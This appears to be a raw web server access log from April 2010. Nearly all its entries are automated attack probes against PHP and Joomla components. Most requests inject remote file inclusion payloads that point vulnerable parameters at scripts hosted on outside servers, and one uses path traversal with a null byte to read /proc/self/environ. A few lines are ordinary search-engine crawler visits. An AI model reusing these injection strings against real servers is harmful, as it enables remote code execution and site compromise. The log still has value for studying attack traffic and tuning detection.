217.73.17.92 - - [15/Apr/2010:21:57:48 -0500] "GET /logs/index2.php?pg=http://hobbes.fdp.unimi.it/~ermesnet/hermes/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
110.45.145.178 - - [15/Apr/2010:21:58:33 -0500] "GET /logs/access_log.1268611200///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://topdiffusion.eu///tdsoft/images/goodid.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.79"
110.45.145.178 - - [15/Apr/2010:21:58:34 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://topdiffusion.eu///tdsoft/images/goodid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
110.45.145.178 - - [15/Apr/2010:21:58:34 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://topdiffusion.eu///tdsoft/images/goodid.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
84.250.141.76 - - [15/Apr/2010:22:01:26 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
84.250.141.76 - - [15/Apr/2010:22:01:26 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
174.133.122.210 - - [15/Apr/2010:22:02:06 -0500] "GET /logs/access_log.1270598400//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
207.46.204.240 - - [15/Apr/2010:22:02:12 -0500] "GET /logs/access_log.1160524800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.73.17.92 - - [15/Apr/2010:22:04:13 -0500] "GET /logs/access_log.1217203200%20%20/index2.php?pg=http://hobbes.fdp.unimi.it/~ermesnet/hermes/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.73.17.92 - - [15/Apr/2010:22:04:14 -0500] "GET /logs/access_log.1217203200%20%20/index2.php?pg=http://hobbes.fdp.unimi.it/~ermesnet/hermes/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.133.122.210 - - [15/Apr/2010:22:04:16 -0500] "GET /logs/access_log.1219622400//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.katalog.artykul.iswift.eu/img/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
116.122.36.61 - - [15/Apr/2010:22:05:02 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
116.122.36.61 - - [15/Apr/2010:22:05:02 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
116.122.36.61 - - [15/Apr/2010:22:05:02 -0500] "GET /logs/access_log.1220054400//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
115.145.170.177 - - [15/Apr/2010:22:05:12 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://www.diakonia-jkt.sch.id/sk//images_kelas/idmulti?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
115.145.170.177 - - [15/Apr/2010:22:05:12 -0500] "GET //?path%5Bdocroot%5D=http://www.diakonia-jkt.sch.id/sk//images_kelas/idmulti?? HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
115.145.170.177 - - [15/Apr/2010:22:05:13 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.diakonia-jkt.sch.id/sk//images_kelas/idmulti?? HTTP/1.1" 200 1953 "-""libwww-perl/5.805"
209.216.43.133 - - [15/Apr/2010:22:06:07 -0500] "GET /logs/access_log.1232236800/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:06:07 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1956 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:06:10 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:06:23 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1956 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:06:23 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:06:23 -0500] "GET /logs/access_log.1232236800/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:07:01 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1956 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:07:01 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:07:01 -0500] "GET /logs/access_log.1232236800/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
116.122.36.61 - - [15/Apr/2010:22:07:42 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
116.122.36.61 - - [15/Apr/2010:22:07:42 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
116.122.36.61 - - [15/Apr/2010:22:07:42 -0500] "GET /logs/access_log.1219708800%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:07:46 -0500] "GET /logs/access_log.1244592000/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
116.122.36.61 - - [15/Apr/2010:22:07:50 -0500] "GET /logs/access_log.1220054400%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:08:16 -0500] "GET /logs/access_log.1244592000/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:09:00 -0500] "GET /logs/access_log.1244592000/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
116.122.36.61 - - [15/Apr/2010:22:10:21 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
116.122.36.61 - - [15/Apr/2010:22:10:21 -0500] "GET /logs/access_log.1220054400%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
116.122.36.61 - - [15/Apr/2010:22:10:21 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
173.212.232.206 - - [15/Apr/2010:22:10:31 -0500] "GET //agenda2.php3?rootagenda=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
173.212.232.206 - - [15/Apr/2010:22:10:31 -0500] "GET /logs/access_log.1262822400//agenda2.php3?rootagenda=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
173.212.232.206 - - [15/Apr/2010:22:10:31 -0500] "GET /logs//agenda2.php3?rootagenda=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
94.247.178.106 - - [15/Apr/2010:22:10:51 -0500] "GET /logs//write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
94.247.178.106 - - [15/Apr/2010:22:10:51 -0500] "GET //write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
94.247.178.106 - - [15/Apr/2010:22:10:51 -0500] "GET /logs/access_log.1268265600//write_update.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:11:28 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:11:28 -0500] "GET /logs/access_log.1265760000/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:11:28 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1956 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:11:33 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1956 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:11:36 -0500] "GET /logs/access_log.1265760000/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:11:40 -0500] "GET /logs/access_log.1265760000/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:11:40 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1956 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:11:40 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:11:50 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:11:50 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1956 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:11:50 -0500] "GET /logs/access_log.1265760000/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
115.145.170.177 - - [15/Apr/2010:22:11:52 -0500] "GET /logs/access_log.1214784000//?path%5Bdocroot%5D=http://www.diakonia-jkt.sch.id/sk//images_kelas/idmulti?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
128.241.54.188 - - [15/Apr/2010:22:12:10 -0500] "GET /logs/access_log.1263859200/index1.php?site=http://3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
128.241.54.188 - - [15/Apr/2010:22:12:10 -0500] "GET /index1.php?site=http://3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
128.241.54.188 - - [15/Apr/2010:22:12:10 -0500] "GET /logs/index1.php?site=http://3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
128.241.54.188 - - [15/Apr/2010:22:12:10 -0500] "GET /logs/access_log.1262736000/index1.php?site=http://3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
116.122.36.61 - - [15/Apr/2010:22:12:26 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
116.122.36.61 - - [15/Apr/2010:22:12:26 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
116.122.36.61 - - [15/Apr/2010:22:12:26 -0500] "GET /logs/access_log.1268265600%20%20//components/com_simpleboard/file_upload.php?sbp=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
212.59.2.84 - - [15/Apr/2010:22:15:16 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.aminaya.com//administrator/components/com_virtuemart/f1.txt????? HTTP/1.1" 404 340 "-""Mozilla/5.0"
212.59.2.84 - - [15/Apr/2010:22:15:17 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.aminaya.com//administrator/components/com_virtuemart/f1.txt????? HTTP/1.1" 404 335 "-""Mozilla/5.0"
212.59.2.84 - - [15/Apr/2010:22:15:17 -0500] "GET /logs/access_log.1219708800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.aminaya.com//administrator/components/com_virtuemart/f1.txt????? HTTP/1.1" 404 362 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:15:37 -0500] "GET /logs/access_log.1223856000/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:15:43 -0500] "GET /logs/access_log.1223856000/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:16:19 -0500] "GET /logs/access_log.1223856000/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:16:23 -0500] "GET /logs/access_log.1223856000/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
207.46.13.135 - - [15/Apr/2010:22:18:12 -0500] "GET /logs/access_log.1213920000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.110.50.121 - - [15/Apr/2010:22:18:12 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.kadiningucu.org//components/com_fabrik/libs/Blowfish/com_null/test.txt???? HTTP/1.1" 404 338 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
78.110.50.121 - - [15/Apr/2010:22:18:12 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.kadiningucu.org//components/com_fabrik/libs/Blowfish/com_null/test.txt???? HTTP/1.1" 404 343 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
207.46.199.183 - - [15/Apr/2010:22:23:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.243 - - [15/Apr/2010:22:23:12 -0500] "GET /logs/access_log.1234137600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.216.43.133 - - [15/Apr/2010:22:23:18 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:23:18 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1956 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:23:19 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:23:19 -0500] "GET /logs/access_log.1232236800/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:23:19 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1956 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:23:25 -0500] "GET /logs/access_log.1232236800/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:24:09 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:24:09 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1956 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:24:09 -0500] "GET /logs/access_log.1232236800/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
110.45.145.178 - - [15/Apr/2010:22:24:49 -0500] "GET /logs/access_log.1219708800///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://topdiffusion.eu///tdsoft/images/goodid.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.79"
89.185.231.103 - - [15/Apr/2010:22:25:01 -0500] "GET /logs//linkadmin.php?page=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
89.185.231.103 - - [15/Apr/2010:22:25:01 -0500] "GET /logs/access_log.1265760000//linkadmin.php?page=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
89.185.231.103 - - [15/Apr/2010:22:25:01 -0500] "GET //linkadmin.php?page=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
116.122.36.61 - - [15/Apr/2010:22:25:35 -0500] "GET /logs/access_log.1268265600%20%20//components/com_simpleboard/file_upload.php?sbp=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
116.122.36.61 - - [15/Apr/2010:22:25:35 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
116.122.36.61 - - [15/Apr/2010:22:25:35 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
89.185.231.103 - - [15/Apr/2010:22:25:44 -0500] "GET /logs//linkadmin.php?page=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
89.185.231.103 - - [15/Apr/2010:22:25:44 -0500] "GET //linkadmin.php?page=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.185.231.103 - - [15/Apr/2010:22:25:44 -0500] "GET /logs/access_log.1265760000//linkadmin.php?page=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
118.217.216.132 - - [15/Apr/2010:22:26:07 -0500] "GET /logs/access_log.1265760000/////?_SERVER[DOCUMENT_ROOT]=http://wkmg.co.kr/bbs/lib/1.txt????%20? HTTP/1.1" 404 315 "-""Mozilla/5.0"
118.217.216.132 - - [15/Apr/2010:22:26:07 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://wkmg.co.kr/bbs/lib/1.txt????%20? HTTP/1.1" 200 1956 "-""Mozilla/5.0"
118.217.216.132 - - [15/Apr/2010:22:26:07 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://wkmg.co.kr/bbs/lib/1.txt????%20? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
118.217.216.132 - - [15/Apr/2010:22:26:43 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://wkmg.co.kr/bbs/lib/1.txt????%20? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
118.217.216.132 - - [15/Apr/2010:22:26:43 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://wkmg.co.kr/bbs/lib/1.txt????%20? HTTP/1.1" 200 1956 "-""Mozilla/5.0"
118.217.216.132 - - [15/Apr/2010:22:26:43 -0500] "GET /logs/access_log.1265760000/////?_SERVER[DOCUMENT_ROOT]=http://wkmg.co.kr/bbs/lib/1.txt????%20? HTTP/1.1" 404 315 "-""Mozilla/5.0"
118.217.216.132 - - [15/Apr/2010:22:26:53 -0500] "GET /logs/access_log.1244073600/////?_SERVER[DOCUMENT_ROOT]=http://wkmg.co.kr/bbs/lib/1.txt????%20? HTTP/1.1" 404 315 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:27:17 -0500] "GET /logs/access_log.1217548800/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
118.217.216.132 - - [15/Apr/2010:22:27:30 -0500] "GET /logs/access_log.1232236800/////?_SERVER[DOCUMENT_ROOT]=http://wkmg.co.kr/bbs/lib/1.txt????%20? HTTP/1.1" 404 315 "-""Mozilla/5.0"
118.217.216.132 - - [15/Apr/2010:22:27:30 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://wkmg.co.kr/bbs/lib/1.txt????%20? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
118.217.216.132 - - [15/Apr/2010:22:27:30 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://wkmg.co.kr/bbs/lib/1.txt????%20? HTTP/1.1" 200 1956 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:27:32 -0500] "GET /logs/access_log.1217548800/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
118.217.216.132 - - [15/Apr/2010:22:27:36 -0500] "GET /logs/access_log.1244073600/////?_SERVER[DOCUMENT_ROOT]=http://wkmg.co.kr/bbs/lib/1.txt????%20? HTTP/1.1" 404 315 "-""Mozilla/5.0"
118.217.216.132 - - [15/Apr/2010:22:27:38 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://wkmg.co.kr/bbs/lib/1.txt????%20? HTTP/1.1" 200 1956 "-""Mozilla/5.0"
118.217.216.132 - - [15/Apr/2010:22:27:38 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://wkmg.co.kr/bbs/lib/1.txt????%20? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
118.217.216.132 - - [15/Apr/2010:22:27:38 -0500] "GET /logs/access_log.1265760000/////?_SERVER[DOCUMENT_ROOT]=http://wkmg.co.kr/bbs/lib/1.txt????%20? HTTP/1.1" 404 315 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:22:27:50 -0500] "GET /logs/access_log.1217548800/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
118.217.216.132 - - [15/Apr/2010:22:28:36 -0500] "GET /logs/access_log.1244592000/////?_SERVER[DOCUMENT_ROOT]=http://wkmg.co.kr/bbs/lib/1.txt????%20? HTTP/1.1" 404 315 "-""Mozilla/5.0"
118.217.216.132 - - [15/Apr/2010:22:28:42 -0500] "GET /logs/access_log.1244073600/////?_SERVER[DOCUMENT_ROOT]=http://wkmg.co.kr/bbs/lib/1.txt????%20? HTTP/1.1" 404 315 "-""Mozilla/5.0"
67.195.112.180 - - [15/Apr/2010:22:28:47 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [15/Apr/2010:22:28:47 -0500] "GET /logs/access_log.1231113600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
79.98.23.9 - - [15/Apr/2010:22:32:16 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
79.98.23.9 - - [15/Apr/2010:22:32:16 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
79.98.23.9 - - [15/Apr/2010:22:32:16 -0500] "GET /logs/access_log.1268611200%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
83.69.115.198 - - [15/Apr/2010:22:33:16 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
83.69.115.198 - - [15/Apr/2010:22:33:16 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
83.69.115.198 - - [15/Apr/2010:22:33:16 -0500] "GET /logs/access_log.1268611200%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
79.98.23.9 - - [15/Apr/2010:22:33:38 -0500] "GET /logs/access_log.1270684800%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
173.212.232.206 - - [15/Apr/2010:22:33:58 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
173.212.232.206 - - [15/Apr/2010:22:33:58 -0500] "GET /logs/access_log.1268956800//delete_all.php?board_skin_path=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
173.212.232.206 - - [15/Apr/2010:22:33:58 -0500] "GET //delete_all.php?board_skin_path=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
83.69.115.198 - - [15/Apr/2010:22:34:52 -0500] "GET /logs/access_log.1270684800%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
61.84.68.4 - - [15/Apr/2010:22:34:56 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.84.68.4 - - [15/Apr/2010:22:34:56 -0500] "GET /logs/access_log.1268611200%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
61.84.68.4 - - [15/Apr/2010:22:34:56 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
79.98.23.9 - - [15/Apr/2010:22:35:02 -0500] "GET /logs/access_log.1268611200//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
